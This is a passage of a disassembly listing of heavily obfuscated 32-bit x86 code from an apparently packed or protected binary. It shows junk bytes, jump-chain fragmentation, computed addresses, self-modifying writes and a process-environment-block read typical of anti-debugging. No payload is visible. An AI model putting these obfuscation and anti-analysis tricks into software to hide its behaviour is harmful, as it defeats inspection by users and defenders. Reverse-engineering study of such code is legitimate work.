		dd 4FD0E9h, 243C8700h, 7DC6815Fh, 8B9858A9h, 3E46E936h
		dd 4870000h, 3C65824h, 242C875Bh, 0B4E9DD8Bh, 47h, 0E90000C3h
		dd 2E2Dh, 243C8700h, 8B240C87h,	78E959F9h, 11h
		db 0
; ---------------------------------------------------------------------------

locret_488939:				; CODE XREF: _3gijy9nr:0048A8EEj
		retn
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 1C33h, 0F70000C3h, 0CA2E9D6h, 1C870000h, 0BF575B24h
					; CODE XREF: _3gijy9nr:0048DB8Aj
		dd 48B815h, 14B6E9h, 0E2E80000h, 0E9000017h, 2756h, 2EFDDE81h
		dd 6EE9C4FEh, 1Ah, 4770E9C3h, 68000000h, 7616B14Fh, 0FCEA815Ah
		dd 819E5BAFh, 4B707CAh,	0EF28123h, 81BBA90Ah, 2C56FFFAh
		dd 2865E996h, 81000000h, 0FF1E56F2h, 35CA81FBh,	810017DFh
		dd 278D10C2h, 35F28108h, 9D9F5598h, 2A3DE8h, 0AC000000h
		dd 0C2FBC201h, 49C23103h, 3F04850Fh, 2C870000h,	45E95224h
		dd 16h,	0CA850F00h, 54h, 9A1C1968h, 0FCE8B6Ah, 474E83h
		dd 0E90F8900h, 54AFh, 78E9D6F7h, 32h, 0F38D0F00h, 87000030h
		dd 6859240Ch, 48A11Ah, 4903E9h,	0B5E38100h, 815EB7DFh
		dd 0BF405ECBh, 70C3815Dh, 0E9A08952h, 19A2h, 928B0F00h
		dd 2B000001h, 91F081D1h, 0C1DBF809h, 0E08102C0h, 898486A6h
		dd 661890Fh, 7DE90000h,	2Eh, 0E951DA13h, 64Dh
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_488A52:				; CODE XREF: sub_48D704:loc_4892A1j
		pop	eax
		or	eax, 0D54F38DEh
		add	eax, 20C00122h

loc_488A5F:				; DATA XREF: sub_48D6DF-3F66o
		add	eax, 1000h
		jmp	loc_48D242
; END OF FUNCTION CHUNK	FOR sub_48D704
; ---------------------------------------------------------------------------

loc_488A69:				; CODE XREF: _3gijy9nr:0048D5C4p
		xchg	ebx, [esp]
		call	near ptr unk_4898FA
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C1h
		db 0CDh	; Í
		db  15h
		db  81h	; 
		db 0FDh	; ý
		db  10h
		db 0C2h	; Â
		db  4Fh	; O
		db 0ECh	; ì
		db 0E9h	; é
		db  6Fh	; o
		db  29h	; )
		db    0
		db    0
		db  68h	; h
		db  11h
		db 0B5h	; µ
		db  48h	; H
		db    0
		db 0E9h	; é
		db 0FEh	; þ
		db  1Dh
		db    0
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------

loc_488A8D:				; CODE XREF: _3gijy9nr:0048D757j
		mov	al, byte ptr ds:dword_48A7F0
		push	ecx
		mov	ecx, esi
		xchg	ecx, [esp]
		jmp	loc_48BECB
; ---------------------------------------------------------------------------
		db  85h	; …
		db 0C8h	; È
		db 0E9h	; é
		db 0FAh	; ú
		db    4
		db    0
		db    0
		db    0
		db    0
		db  8Bh	; ‹
		db  19h
		db  58h	; X
		db 0E9h	; é
		db 0E1h	; á
		db  35h	; 5
		db    0
		db    0
		db    0
		db 0C3h	; Ã		; CODE XREF: _3gijy9nr:loc_48DC92j
		db 0E8h	; è
		db  40h	; @
		db  53h	; S
		db    0
		db    0
		db    0
		db  87h	; ‡
		db  14h
		db  24h	; $
		db 0E8h	; è
		db    5
		db  1Ch
		db    0
		db    0
		db    0
		db    0
		db  87h	; ‡
		db 0DAh	; Ú
		db 0E9h	; é
		db  2Bh	; +
		db  42h	; B
		db    0
		db    0
		db    0
		db    0
		db  81h	; 
		db 0C0h	; À
		db 0B4h	; ´
		db 0CBh	; Ë
		db  33h	; 3
		db  52h	; R
		db 0C1h	; Á
		db 0E6h	; æ
		db  19h
		db 0E9h	; é
		db  89h	; ‰
		db  2Bh	; +
		db    0
		db    0
		db    0
		db  81h	; 
		db 0EEh	; î
		db 0E0h	; à
		db  76h	; v
		db 0C8h	; È
		db  98h	; ˜
		db  81h	; 
		db 0F6h	; ö
		db 0E0h	; à
		db 0AAh	; ª
		db 0CAh	; Ê
		db 0A0h	;  
unk_488AE5	db 0FFh			; DATA XREF: sub_48B609-1BFo
		db  34h	; 4
		db  24h	; $
		db 0FFh
		db  15h
		db 0C0h	; À
		db 0D0h	; Ð
		db  45h	; E
		db    0
		db 0E9h	; é
		db  9Ch	; œ
		db  25h	; %
		db    0
		db    0
		db    0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48C9A0

loc_488AF4:				; CODE XREF: sub_48C9A0:loc_48D8C0j
		call	sub_488830
		add	[edi], cl
		test	ebx, ebx
		xor	[eax], eax
		add	cl, ch
		dec	ecx
		cmp	al, [eax]
; END OF FUNCTION CHUNK	FOR sub_48C9A0
; ---------------------------------------------------------------------------
		db    0
		db    0
; ---------------------------------------------------------------------------

locret_488B06:				; CODE XREF: _3gijy9nr:0048B3C5j
		retn
; ---------------------------------------------------------------------------
unk_488B07	db 0E9h	; é		; DATA XREF: _3gijy9nr:0048B3C0o
		db  6Ah	; j
		db  1Bh
		db    0
		db    0
		db 0E9h	; é
		db 0BFh	; ¿
		db  1Ah
		db    0
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488E43

loc_488B12:				; CODE XREF: _3gijy9nr:00489928j
					; sub_488E43:loc_48A9D9j ...
		push	offset word_489DAE
		jmp	loc_48DD61
; END OF FUNCTION CHUNK	FOR sub_488E43
; ---------------------------------------------------------------------------
		jnz	loc_4893B7
		add	[ebx], ch
		retf
; ---------------------------------------------------------------------------
		jmp	loc_4893A4
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 4
		dd 0AA1D8768h, 24348798h, 815EFE8Bh, 91A7E7C7h,	90F781FDh
		dd 0E96A2FE1h, 0FFFFFDDBh, 28DBE381h, 0F3812409h, 5F85B692h
		dd 0D9DFC381h, 0EB812568h, 0CCCA9D16h, 0FADBF381h, 0C399D823h
		dd 8B243487h, 3326E9DEh, 8F640000h, 5, 0D9476800h, 27E90048h
		dd 24h,	0A840F00h, 87000035h, 7A890FD6h, 8100003Ch, 0A59A4F6h
		dd 26CE81E1h, 57C7B4ECh, 3C87F98Bh, 4CE3E924h, 0
; ---------------------------------------------------------------------------
		js	loc_48A650
		jmp	loc_48AC2A
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48D6DF

loc_488BB8:				; CODE XREF: sub_48D6DF:loc_48B0DEj
		mov	byte ptr [edi],	5
		not	edi
		jmp	loc_489428
; END OF FUNCTION CHUNK	FOR sub_48D6DF
; ---------------------------------------------------------------------------
		align 4
dword_488BC4	dd 4A338D0Fh, 0E9000000h, 1288h, 2ADBE9h, 0EE5C100h, 521CC7F7h
		dd 0BBE9FDF2h, 32h, 0C60000C3h,	8B598D01h, 51BCE9ECh, 0
; ---------------------------------------------------------------------------

loc_488BF4:				; CODE XREF: _3gijy9nr:0048C8BAj
		sbb	ebx, 7B3AD848h
		jmp	loc_48B08A
; ---------------------------------------------------------------------------
		align 10h
dword_488C00	dd 0C300h, 2772E9h, 0E9000000h,	0BFFh, 36D6E800h, 8E0F0000h
					; CODE XREF: sub_48B609+1857j
		dd 2D9h, 58240487h, 0ADD3CF68h,	241C87A6h, 0E95BD38Bh
		dd 35D1h, 8100C600h, 8B240C87h,	36E959C1h, 45h,	0C0F4358Bh
		dd 0E4680048h, 87C04BF7h, 0CF8B243Ch, 11F1815Fh, 814E7FE4h
		dd 747EB5C9h, 96E1810Eh, 0E9E5C273h, 52FDh, 0C7D0FF00h
		dd 1FC45h, 458B0000h, 148759FCh, 0E8EA8B24h, 21BFh, 2BEB1B53h
		dd 0EFE681F5h, 81E303A5h, 442194CEh, 6C681BEh, 87020489h
		dd 62E92434h, 8B00004Fh, 243C87F9h, 53E95656h, 24h, 0FB8E820Fh
		dd 6853FFFFh, 4EE5F155h, 6CEB815Bh, 811A5ABEh, 0F862A5C3h
		dd 0F5F3816Dh, 0E99894E6h, 13D9h, 34870000h, 7C65E24h
		dd 240C878Bh, 84E9F98Bh, 0C3000002h, 72680000h,	0E90048C3h
		dd 4415h, 0C6810000h, 5A70DE71h, 0E9243487h, 2ED3h, 50685300h
		dd 0E8F99B26h, 427Fh, 2AB1830Fh, 2AE90000h, 3000034h, 4875BC3h
		dd 0FD20924h, 49B084h, 3DB5E900h, 0C7810000h, 0AD804054h
		dd 9986E781h, 0C781F612h, 0FA48A0F5h, 0BDEE9h, 87C08100h
		dd 56DD748Ch, 4896A368h, 3019E900h, 0C3000000h,	6D685000h
		dd 5850AA17h, 810BC0C1h, 7C760AC0h, 33E8815Bh, 81938A6Dh
		dd 9B2B6EC0h, 114DE9E7h, 0
; ---------------------------------------------------------------------------
		cdq
		jmp	loc_489290
; ---------------------------------------------------------------------------
		dw 0F00h
		dd 4C3982h, 4063E900h, 68000000h, 48D445h, 2F34E9h
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_488D95:				; CODE XREF: sub_48B609-1F53j
					; sub_48CDDE+4j
		push	edi
		mov	edi, edx
		xchg	edi, [esp+4+var_4]
		add	eax, 4
		call	loc_489080

loc_488DA3:				; CODE XREF: sub_48B609+10EEj
		jmp	loc_48BD70
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dd 0E9D83B00h, 0FFFFFAB9h, 3F30840Fh, 8B560000h, 243487F7h
					; CODE XREF: sub_48C3B4+4j
		dd 48A168BFh, 3D40E900h, 8F0F0000h, 87Dh, 0E9BE9h, 14F1E800h
		dd 0
; ---------------------------------------------------------------------------
		xor	eax, 0C00923Fh
		sub	eax, 7604CAAFh
		rol	eax, 15h
		add	eax, 0DB51C5A7h
		add	eax, ebp
		add	eax, 889B105Eh
		popf
		jmp	loc_48DBB1
; ---------------------------------------------------------------------------
		align 4
		dd 1BF2850Fh, 0
		dd 0FFFD3FE9h, 0E9F13BFFh, 0F1Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_488E12:				; DATA XREF: _3gijy9nr:0048A8E9o
		pop	ecx
		push	offset byte_48A58F
		jmp	loc_48A258
; ---------------------------------------------------------------------------
		push	340481B7h
		xchg	ecx, [esp]
		mov	eax, ecx
		push	edi
		push	0CF27C133h
		pop	edi
		rol	edi, 1
		add	edi, 61F91966h
		jmp	loc_48B376
; ---------------------------------------------------------------------------
		align 4
		sbb	edi, ecx
		jmp	loc_48A6C3

; =============== S U B	R O U T	I N E =======================================



sub_488E43	proc near		; CODE XREF: _3gijy9nr:0048C56Ej
					; sub_48CA8E+5p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00488B12 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0048A9D9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DD61 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	edx, [esp+0]
		jmp	loc_48A9D9
sub_488E43	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	offset dword_48AF60
		jmp	locret_488F34
; ---------------------------------------------------------------------------
		align 2
		dw 0F681h
		dd 0E7BEFFA7h, 0DC5EC690h, 229084h, 1600E900h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_588. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_488E71:				; CODE XREF: sub_48B609+3Aj
		jmp	loc_48C14C
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0E900h
		dd 2526h
; ---------------------------------------------------------------------------

loc_488E7C:				; DATA XREF: sub_48B609:loc_48DBD1o
		xchg	eax, [esp]
		mov	ecx, eax
		pop	eax
		mov	eax, [eax]
		jmp	loc_48B580
; ---------------------------------------------------------------------------
		db 0Fh,	86h, 9Eh
		dd 8700000Ah, 0FF5A2414h, 0FDD1E9D0h, 0E800FFFFh, 4D7Dh
					; CODE XREF: _3gijy9nr:0048C643j
		dd 13E900h, 5E000000h, 58F64h, 68000000h, 48C1D4h, 4880E9h
		dd 0C300h, 594901C6h, 3103C2C1h, 850F49C2h, 3A02h, 31E9E9h
		dd 0E95D0000h, 431Eh, 13DA1B00h, 424FE9D0h, 0C3000000h
		dd 28E5E9h, 4084E800h, 890F0000h, 2B7h,	4C14E953h, 0C6000000h
		dd 535F8B07h, 54E9DD8Bh, 42h, 8702C600h, 7711685Ah, 0E959A251h
		dd 0FFFFFA47h, 48CBDE68h, 3273E900h, 0F000000h,	1CEB85h
		dd 88C6F700h, 0E908A45Eh, 284h
; ---------------------------------------------------------------------------

locret_488F34:				; CODE XREF: _3gijy9nr:00488E54j
		retn

; =============== S U B	R O U T	I N E =======================================



sub_488F35	proc near		; CODE XREF: sub_48B609-21D7p
					; _3gijy9nr:0048C825j

; FUNCTION CHUNK AT 00489573 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0048A818 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048A88F SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0048B5E6 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0048C7E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0048DCC8 SIZE 0000000F BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	esi
		mov	esi, eax
		jmp	loc_48C7E1
sub_488F35	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 2
		jno	loc_488FF6
		jmp	loc_48A091
; ---------------------------------------------------------------------------

loc_488F4D:				; CODE XREF: _3gijy9nr:0048AEC0j
		cmp	ebx, 0B438AF0h
		jmp	loc_48BBB2
; ---------------------------------------------------------------------------
		dd 4C85850Fh, 0
; ---------------------------------------------------------------------------

loc_488F60:				; CODE XREF: _3gijy9nr:004897AAj
		jmp	loc_48A7D3
; ---------------------------------------------------------------------------
		db 2 dup(0), 0E9h
		dd 1ABFh, 0E2C10000h, 850E905h
		db 3 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B5AE

loc_488F77:				; CODE XREF: sub_48B5AE:loc_48AE92j
		push	28A4FF2Bh
		pop	ecx
		and	ecx, 78EBD26Ah
		rol	ecx, 10h
		add	ecx, 8730D893h
		or	ecx, 9B7EB298h
		add	ecx, 24C9106Ch
		jmp	loc_489FF2
; END OF FUNCTION CHUNK	FOR sub_48B5AE
; ---------------------------------------------------------------------------
		db 2 dup(0), 0Fh
		dd 0E3F89h, 87F78700h, 34872404h, 5EC68B24h, 0E90903C6h
		dd 0FFFFFA8Ah, 0F4A36857h, 815FF3E4h, 4C1DA9F7h, 3C1FE992h
		dd 0E9990000h, 43C1h, 241C8700h, 8B240487h, 0F86858D8h
		dd 5E0322ABh, 7D25F681h, 2CE9D1B7h, 6, 240C87C3h, 8B242C87h
		db 0CDh, 5Dh
; ---------------------------------------------------------------------------

loc_488FF6:				; CODE XREF: _3gijy9nr:00488F42j
		mov	byte ptr [ecx],	0Fh
		pop	ecx
		jmp	loc_48B2E7
; ---------------------------------------------------------------------------
		align 10h
		db 0
; ---------------------------------------------------------------------------

loc_489001:				; CODE XREF: _3gijy9nr:loc_48ACF9j
		sub	edi, 0C4A058C2h
		and	edi, 0E5AF2117h
		xor	edi, 0F372FD8Ah
		add	edi, ebp
		add	edi, 2D832355h
		jmp	loc_48976A
; ---------------------------------------------------------------------------
		dd 0D9810000h, 203C5007h, 53E9h
		db 0
; ---------------------------------------------------------------------------

loc_48902D:				; CODE XREF: sub_489593:loc_48DCEFp
		xchg	edx, [esp]
		pop	edx
		mov	byte ptr [ecx],	8Bh
		pop	ecx
		call	sub_48CF4E
; ---------------------------------------------------------------------------
		dw 0
; ---------------------------------------------------------------------------

locret_48903C:				; CODE XREF: _3gijy9nr:004894B7j
		retn
; ---------------------------------------------------------------------------
		align 2
		jmp	loc_48CEA6
; ---------------------------------------------------------------------------
		align 4
		db 0
; ---------------------------------------------------------------------------

loc_489045:				; CODE XREF: _3gijy9nr:00489BD0j
		push	edx
		push	5770320Bh
		pop	edx
		and	edx, 475E9238h
		xor	edx, 1816ADF9h
		jmp	loc_48B2D6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48905D:				; CODE XREF: sub_48B609+1D5Dj
		jg	loc_48B414
		sub	ebp, edx

loc_489065:				; CODE XREF: sub_48B609:loc_48D35Aj
		sub	esi, 0CF404069h
		test	esi, 40000h
		jmp	loc_48DB6F
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		push	offset dword_48D764
		jmp	locret_489FA2
; ---------------------------------------------------------------------------

loc_489080:				; CODE XREF: sub_48B609-286Bp
		xchg	eax, [esp]
		pop	eax
		push	eax
		push	0D4282460h
		pop	eax
		and	eax, 2B12F4C3h
		jns	loc_489906
		add	cl, ch		; CODE XREF: _3gijy9nr:00489544j
		add	[ecx], bl
; ---------------------------------------------------------------------------
		db 0
		dd 6A850F00h, 0E8FFFFF7h, 42D2h, 0BF680000h, 0E9004887h
		dd 428Bh, 9084F681h, 0E68158DDh, 7B7E7776h, 2107F681h
		dd 0C681DEC5h, 0DE7ABDD2h
		db 3, 0C6h, 5Eh
byte_4890CF	db 8Bh			; DATA XREF: sub_489593+2o
		dd 41B1E800h, 0E9000000h, 0FFFFFCFCh, 0F3810000h, 772B1DB9h
		dd 1122CB81h, 0C3812CD2h, 0C3721A64h, 4079E9h, 3C870000h
		dd 68565F24h, 35F579BFh, 8B243C87h, 15E95FF7h, 2Ah, 45E9C300h
		dd 0FFFFFEh
; ---------------------------------------------------------------------------

loc_489114:				; DATA XREF: sub_488830+3DB5o
		popf
		mov	dword ptr [edx], 1000h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_582. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_48911C:				; CODE XREF: _3gijy9nr:0048CD35j
		jmp	loc_48C52D
; ---------------------------------------------------------------------------
		align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_573. PRESS KEYPAD	"+" TO EXPAND]
		db 59h
		dd 32h,	0C300C600h, 6BE900C3h, 0E9000024h, 594h, 0A03A6800h
		dd 0B9E90048h, 8100003Eh, 786CACAh, 24EA812Ah, 0E85CF59Fh
		dd 1D9Eh, 2342E900h, 0C3000000h, 24148700h, 8B243C87h
		dd 8B515FD7h, 240C87CAh, 48AE69BAh, 2560E900h, 87000000h
		dd 875E2434h, 68582404h, 0AC08643Ah, 17C2815Ah,	0F6B2047h
		dd 262C89h, 241C8700h, 4C8B515Bh, 1C71024h, 10001h, 1491E9h
		dd 0C6000000h, 5A5B8703h, 5624340Eh, 4970E95Dh,	0
dword_4891B8	dd 0FBED8A0Fh, 0F70BFFFFh, 0D53BFA23h, 1A43E9h,	0BB535600h
		dd 488D55h, 4134E9h, 0FD030000h, 5E046851h, 81598284h
		dd 0F80C48C1h, 8C1C18Ah, 2987E9h, 81000000h, 1845BBEBh
		dd 82E38109h, 812C4DF1h, 471B06C3h, 5BF303DBh, 0DAE90689h
		dd 42h,	1C8700C3h, 2E6EE924h, 880F0000h, 20D2h,	481B768h
		dd 17F6E834h, 0
		dd 0D81BC68Bh, 0F19C0C1h, 479F8Ah, 6CCE900h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_561. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48ADD6

loc_48923D:				; CODE XREF: sub_48ADD6+Bj
		jmp	loc_48AB67
; END OF FUNCTION CHUNK	FOR sub_48ADD6
; ---------------------------------------------------------------------------
		align 4
		popf
		xchg	eax, [esp]
		xchg	edi, [esp]
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_48924B:				; CODE XREF: sub_48B609:loc_4896AEj
		mov	eax, edi
		jmp	loc_489F69
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 5100h
; ---------------------------------------------------------------------------
		push	0EDAF16A0h
		pop	ecx
		add	ecx, 52342E07h
		xor	ecx, 1AC04017h
		and	ecx, 0B2BFB140h
		xor	ecx, 3623CB07h
		add	ecx, 0EA480141h
		jmp	loc_48CC3E
; ---------------------------------------------------------------------------
		sub	edx, ebx
		jmp	loc_48953A
; ---------------------------------------------------------------------------
		dd 38680000h, 0E9004894h, 3A70h	; CODE XREF: sub_48D1F6+1Bj
; ---------------------------------------------------------------------------

loc_489290:				; CODE XREF: _3gijy9nr:00488D79j
		xchg	esi, [esp]
		pop	esi
		mov	eax, large fs:30h
		call	sub_48CE8D
; ---------------------------------------------------------------------------
		db 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48D704

loc_4892A1:				; CODE XREF: sub_48D704+Ej
		jmp	loc_488A52
; END OF FUNCTION CHUNK	FOR sub_48D704
; ---------------------------------------------------------------------------
		test	eax, 0AF126D91h
		jmp	loc_48C716
; ---------------------------------------------------------------------------
		align 2
		retn
; ---------------------------------------------------------------------------
		align 4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_547. PRESS KEYPAD	"+" TO EXPAND]
		align 2

loc_4892B6:				; CODE XREF: _3gijy9nr:loc_489471j
		xor	eax, 0A3BE18A5h
		or	eax, 687129E7h
		add	eax, 14C6A735h
		mov	eax, [eax]

loc_4892CA:				; DATA XREF: sub_48B609:loc_48B78Do
		or	eax, eax
		jnz	loc_4892D7
		jmp	loc_48B05B
; ---------------------------------------------------------------------------

loc_4892D7:				; CODE XREF: _3gijy9nr:004892CCj
		mov	eax, [eax]
		jmp	loc_48D784
; ---------------------------------------------------------------------------
		dw 0C281h
		dd 78E93C7Ch, 1012E8h, 0E9000000h, 303Ch
		db 2 dup(0)
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_4892F2:				; CODE XREF: sub_48B609+270j
					; sub_48C67D+5D6j
		mov	edx, [eax]
		push	offset loc_4898CA
		jmp	nullsub_557
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		align 10h
		dd 4BE4E181h, 0C181ECF3h, 97E8C270h, 48C79768h,	44F8E900h
		dd 87000000h, 15FF2434h, 45D0C0h, 147FE9h, 24348700h, 2C87CE8Bh
		dd 5DF58B24h, 282E9h, 68000000h, 489FCCh, 24BFE9h, 87000000h
		dd 0E9582404h, 0A9Fh, 830F0000h, 3CDAh,	445800Fh, 68500000h
		dd 57F39D9Eh, 248FE9h, 815A0000h, 4B16BCE6h, 9BEE811Ch
		dd 0E81EB580h, 2EFFh

; =============== S U B	R O U T	I N E =======================================



sub_489378	proc near		; CODE XREF: sub_48ADD6:loc_48AB67p
					; _3gijy9nr:0048CC1Fj
		xchg	esi, [esp+0]
		pop	esi
		push	offset byte_48A879
		jmp	nullsub_558
sub_489378	endp

; ---------------------------------------------------------------------------
		dw 8700h
		dd 0D38B241Ch, 0B1C2815Bh, 81F4EA40h, 30CA69F2h, 87C2031Ah
		dd 4DE9243Ch, 0FFFFF5h
; ---------------------------------------------------------------------------

loc_4893A4:				; CODE XREF: _3gijy9nr:00488B25j
		sub	ecx, 0E530EB84h
		sub	ebx, 58453F5h
		push	edx
		sub	edx, 6C11BF9Bh

loc_4893B7:				; CODE XREF: _3gijy9nr:00488B1Cj
		add	esi, 357A654Dh
		jmp	loc_48C2AF
; ---------------------------------------------------------------------------
		adc	eax, ebx
		jmp	loc_48A427
; ---------------------------------------------------------------------------
		db 2 dup(0), 56h
; ---------------------------------------------------------------------------
		push	908C8BDBh
		pop	esi
		or	esi, 0A87D01A9h
		add	esi, 299C77A8h
		jmp	loc_489485
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 2 dup(0)
; ---------------------------------------------------------------------------

loc_4893E6:				; CODE XREF: _3gijy9nr:loc_48B376j
		mov	byte ptr [edi],	87h
		pop	edi
		xchg	esi, [esp]
		mov	ecx, esi
		pop	esi
		or	eax, 0C3C973C8h
		and	eax, 4B0FD564h
		rol	eax, 1Dh
		jmp	loc_48A9D2
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		align 2
		popf
; START	OF FUNCTION CHUNK FOR sub_48D4C3

loc_489407:				; CODE XREF: sub_48D4C3:loc_48C8E8j
		xchg	ebx, [esp+0]
		retn
; END OF FUNCTION CHUNK	FOR sub_48D4C3
; ---------------------------------------------------------------------------
		align 4
; START	OF FUNCTION CHUNK FOR sub_48DF6B

loc_48940C:				; CODE XREF: sub_48DF6B+7j
		xchg	eax, [esp+0]
		mov	edx, offset loc_48D0A3
		jmp	loc_48AB9B
; END OF FUNCTION CHUNK	FOR sub_48DF6B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_48B609

loc_489419:				; CODE XREF: sub_48B609:loc_489F69j
		pop	edi
		dec	ecx
		test	al, 85h
		lodsd
		xor	al, 0
		add	al, ch
		stosd
		cmp	eax, 0

loc_489428:				; CODE XREF: sub_48D6DF-4B22j
					; _3gijy9nr:loc_48C716j
		pop	edi
		add	eax, ebp
		add	eax, 771D9AABh
		popf
		call	sub_488F35
		add	[ecx-6A11CC40h], al
		pop	eax
		call	sub_48C4AC
		add	cl, ch		; CODE XREF: sub_48B609+167j
		imul	edx, [edi], 0
		add	[edi], cl
		mov	fs, word ptr [ebx-16FFFFB5h]
		leave
		inc	edi
; END OF FUNCTION CHUNK	FOR sub_48B609
; ---------------------------------------------------------------------------
		dw 0
		dd 81DF2B00h, 1B5455EDh, 4B09E9F5h, 8B000000h, 1E85DCDh
					; CODE XREF: sub_489E9B:loc_48D8C6j
		dd 0F000008h, 41278Dh
		db 0
; ---------------------------------------------------------------------------

loc_489471:				; CODE XREF: _3gijy9nr:0048A65Aj
		jmp	loc_4892B6
; ---------------------------------------------------------------------------
		dw 8100h
		dd 9F9EB3E9h, 13E2C1A8h, 4107E9h
		db 0
; ---------------------------------------------------------------------------

loc_489485:				; CODE XREF: _3gijy9nr:004893DEj
		add	eax, esi
		pop	esi
		mov	eax, [eax]
		popf
		jmp	loc_48ABFB
; ---------------------------------------------------------------------------

loc_489490:				; DATA XREF: _3gijy9nr:0048B1ADo
		pop	edi
		push	edx
		mov	edx, ebx
		xchg	edx, [esp]
		mov	ebx, offset loc_48DD1D
		jmp	loc_48DD04
; ---------------------------------------------------------------------------
		db 2 dup(0), 58h
; ---------------------------------------------------------------------------
		add	eax, 0AF78E588h
		xor	eax, 5ABC71BDh
		add	eax, ebp
		push	offset loc_48D14B
		jmp	locret_48903C
; ---------------------------------------------------------------------------
		dd 4870000h, 6D685824h,	57776AF7h, 48CF5BBFh, 0FBA4E900h
		dd 0F00FFFFh, 48A484h, 3E00E900h, 0
; ---------------------------------------------------------------------------
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp]
		push	offset byte_48D865
		jmp	locret_48C762
; ---------------------------------------------------------------------------
		dd 57D88100h, 815FAEC0h, 2A5110FBh, 3F2E94Bh, 0F000000h
		dd 49684h, 41B3E900h, 0
; ---------------------------------------------------------------------------

loc_489510:				; DATA XREF: sub_48CE8D:loc_48B5F6o
		xchg	edi, [esp]
		mov	esi, edi
		pop	edi

loc_489516:				; DATA XREF: _3gijy9nr:004897A5o
		pop	dword ptr [esi+edx+51000004h]
		mov	ecx, offset loc_489925
		jmp	loc_48B7EA
; ---------------------------------------------------------------------------
		align 4
dword_489528	dd 0F96D820Fh, 0BF57FFFFh, 48D15Eh, 0FFF9C2E9h
					; DATA XREF: _3gijy9nr:0048CB15o
; ---------------------------------------------------------------------------
		inc	dword ptr [eax]

loc_48953A:				; CODE XREF: _3gijy9nr:0048927Fj
		push	0C8C3B397h
		push	offset loc_48C05E
		jmp	near ptr loc_489097+1
; ---------------------------------------------------------------------------
		align 2
		dw 8A0Fh
		dd 3102h, 443DE9h
		db 0, 0C3h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489B60

loc_489556:				; CODE XREF: _3gijy9nr:00488869j
					; sub_489B60+Bj
		mov	eax, edx
		xchg	eax, [esp+0]

loc_48955B:				; DATA XREF: sub_48CEEE-32CEo
		mov	cl, 68h
		jnz	short loc_489584
		pushf
		and	bl, [edx-7Fh]
		repne insd
		movsd
		fcmovb	st, st(2)
		or	edx, 8A11ED9Bh
		jmp	loc_48DE3A
; END OF FUNCTION CHUNK	FOR sub_489B60
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_488F35

loc_489573:				; CODE XREF: sub_488F35:loc_48C7E1j
		xchg	esi, [esp+0]
		call	sub_48D704
		jmp	loc_48B5E6
; END OF FUNCTION CHUNK	FOR sub_488F35
; ---------------------------------------------------------------------------
		db 0, 8Bh, 0F1h
byte_489583	db 81h			; CODE XREF: sub_48B609:loc_48C507j
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_489B60

loc_489584:				; CODE XREF: sub_489B60-603j
		mov	byte ptr [esi+7Dh], 1Ah
		cmp	[esp+esi+arg_2E920], 0
; END OF FUNCTION CHUNK	FOR sub_489B60
; ---------------------------------------------------------------------------
		db 2 dup(0), 0C3h

; =============== S U B	R O U T	I N E =======================================



sub_489593	proc near		; CODE XREF: _3gijy9nr:0048B2DFj
					; sub_48CCF3-18Cp

; FUNCTION CHUNK AT 0048DCEF SIZE 00000005 BYTES

		push	ebp
		push	ecx
		mov	ecx, offset byte_4890CF
		jmp	loc_48DCEF
sub_489593	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h
